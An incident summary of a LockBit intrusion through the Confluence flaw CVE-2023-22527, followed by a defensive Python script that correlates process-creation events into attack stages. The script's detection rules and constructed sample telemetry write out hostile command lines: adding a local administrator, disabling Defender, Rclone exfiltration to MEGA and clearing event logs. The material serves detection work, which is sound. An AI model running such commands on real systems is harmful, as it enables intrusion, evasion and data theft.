In a swift and highly coordinated attack, LockBit ransomware operators exploited a critical remote code execution vulnerability (CVE-2023-22527) in Atlassian Confluence servers, targeting an exposed Windows server.
This vulnerability, rated CVSS 10.0, enabled unauthenticated attackers to execute arbitrary commands by injecting malicious Object-Graph Navigation Language (OGNL) expressions into improperly sanitized template files.
The attack commenced with system discovery commands, such as net user and whoami, to enumerate user accounts and gather system details.
The attackers leveraged this initial foothold to deploy AnyDesk for persistent access and used the Metasploit framework to establish command-and-control (C2) channels.
Within minutes, they escalated privileges by creating a new local administrator account and proceeded to disable security defenses, including Windows Defender.
Using Remote Desktop Protocol (RDP), the attackers moved laterally across the network, targeting key systems such as backup servers and file shares.
According to the DFIR Report, they employed tools like Mimikatz to extract credentials and SoftPerfect’s NetScan for network enumeration.
On the backup server, they executed PowerShell scripts to retrieve sensitive Veeam credentials and accessed additional systems using these compromised accounts.
Data exfiltration began just over an hour into the intrusion. The attackers used Rclone, a legitimate cloud storage tool, to transfer sensitive files to MEGA.io.
To cover their tracks, they cleared Windows event logs and deleted files associated with their operations.
Approximately two hours after initial access, the attackers launched the LockBit ransomware payload.
Initially, ransomware binaries were executed manually on specific servers via active RDP sessions.
To ensure widespread encryption, they utilized PDQ Deploy, an enterprise software deployment tool, automating the distribution of ransomware binaries across multiple endpoints via SMB shares.
A secondary encryption wave was triggered by mounting remote systems’ C$ shares as a failsafe mechanism.
The attack culminated in encrypted files bearing the .rhddiicoE extension and ransom notes left on compromised systems.
The attackers also altered desktop backgrounds as part of their ransomware execution process.
This incident underscores the critical importance of patching known vulnerabilities promptly and implementing robust monitoring mechanisms to detect anomalous activity early in its lifecycle.
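The monitoring point above is easier to act on with a concrete detection: the intrusion chain described in this article (a shell spawned by the Confluence process, discovery commands, a new local administrator, Defender tampering, Rclone to MEGA, event-log clearing, PDQ Deploy fan-out) produces a recognisable sequence of process-creation events on a small number of hosts within a couple of hours. The script below is an added example written for this page, not code from the DFIR Report or any vendor; the event fields, host names, user names and command lines are constructed sample data, and the stage regexes are illustrative rules rather than a published rule set. It classifies each event into a kill-chain stage and raises a per-host alert when several distinct stages occur inside one time window, which is how the individually noisy signals (a lone whoami) become a high-confidence finding.

```python
"""Stage correlation over process-creation telemetry, modelled on the intrusion described above.

Constructed example: ProcEvent fields, host/user names and command lines are
assumptions for illustration, not telemetry from the DFIR Report.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
import re


@dataclass(frozen=True)
class ProcEvent:
    ts: datetime
    host: str
    user: str
    parent: str   # parent process image (path or name)
    cmdline: str  # full command line of the new process


# Initial access: the Confluence (Java/Tomcat) process should never spawn a shell.
WEB_PARENT = re.compile(r"tomcat|confluence|java\.exe", re.I)
SHELL_CHILD = re.compile(r"\b(cmd|powershell|pwsh)(\.exe)?\b", re.I)

# Later stages, matched against "parent + cmdline" so tool-spawned children are caught too.
STAGE_RULES = {
    "discovery": re.compile(r"\b(net1?\s+user|whoami)\b", re.I),
    "local_admin_created": re.compile(
        r"\bnet1?\s+(user\s+\S+\s+\S+\s+/add|localgroup\s+administrators\s+\S+\s+/add)\b", re.I),
    "defense_evasion": re.compile(r"set-mppreference.*-disablerealtimemonitoring", re.I),
    "exfiltration": re.compile(r"\brclone(\.exe)?\b.*\bmega\b", re.I),
    "log_clearing": re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I),
    "mass_deployment": re.compile(r"pdqdeploy", re.I),
}


def classify(event: ProcEvent) -> list[str]:
    """Return every stage name the event matches (an event may hit more than one)."""
    stages = []
    if WEB_PARENT.search(event.parent) and SHELL_CHILD.search(event.cmdline):
        stages.append("confluence_spawned_shell")
    text = f"{event.parent} {event.cmdline}"
    stages.extend(stage for stage, rx in STAGE_RULES.items() if rx.search(text))
    return stages


def correlate(events, window=timedelta(hours=3), min_stages=3) -> dict[str, list[str]]:
    """Per host, find the largest set of distinct stages that fall inside one sliding window.

    Hosts reaching min_stages are returned with their sorted stage list; a single
    discovery command on a helpdesk workstation never clears the threshold.
    """
    hits: dict[str, list[tuple[datetime, str]]] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        for stage in classify(ev):
            hits.setdefault(ev.host, []).append((ev.ts, stage))
    alerts = {}
    for host, seq in hits.items():
        best: set[str] = set()
        for i, (t0, _) in enumerate(seq):
            in_window = {s for t, s in seq[i:] if t - t0 <= window}
            if len(in_window) > len(best):
                best = in_window
        if len(best) >= min_stages:
            alerts[host] = sorted(best)
    return alerts


# Constructed sample telemetry following the article's timeline (minutes after first access).
T0 = datetime(2024, 1, 1, 10, 0, 0)
SAMPLE_EVENTS = [
    ProcEvent(T0, "CONF01", "NT AUTHORITY\\SYSTEM", r"C:\Atlassian\Confluence\jre\bin\java.exe", "cmd.exe /c whoami"),
    ProcEvent(T0 + timedelta(minutes=2), "CONF01", "NT AUTHORITY\\SYSTEM", "cmd.exe", "net user"),
    ProcEvent(T0 + timedelta(minutes=9), "CONF01", "NT AUTHORITY\\SYSTEM", "cmd.exe", "net user svc_backup ******** /add"),
    ProcEvent(T0 + timedelta(minutes=11), "CONF01", "NT AUTHORITY\\SYSTEM", "cmd.exe", "net localgroup administrators svc_backup /add"),
    ProcEvent(T0 + timedelta(minutes=15), "CONF01", "CONF01\\svc_backup", "explorer.exe",
              "powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true"),
    # benign: a helpdesk user checking their own context on a workstation
    ProcEvent(T0 + timedelta(minutes=30), "WS02", "CORP\\helpdesk1", "explorer.exe", "whoami"),
    ProcEvent(T0 + timedelta(minutes=75), "BKP01", "CORP\\svc_veeam", "cmd.exe", r"rclone.exe copy \\BKP01\Backups mega:archive"),
    ProcEvent(T0 + timedelta(minutes=100), "BKP01", "CORP\\svc_veeam", "cmd.exe", "wevtutil cl Security"),
    ProcEvent(T0 + timedelta(minutes=120), "BKP01", "NT AUTHORITY\\SYSTEM", "PDQDeployRunner-1.exe",
              r"\\BKP01\C$\Windows\Temp\payload.exe"),  # placeholder binary name
]

if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {', '.join(stages)}")
```

Running it alerts on CONF01 (shell from Confluence, discovery, local admin, Defender tampering) and BKP01 (exfiltration, log clearing, mass deployment) while WS02 stays quiet. In production the same structure sits on top of Sysmon Event ID 1 or Windows Security 4688 data, and the threshold and window are tuned to the environment; the value is in the correlation, since every single stage here has a legitimate administrative look-alike.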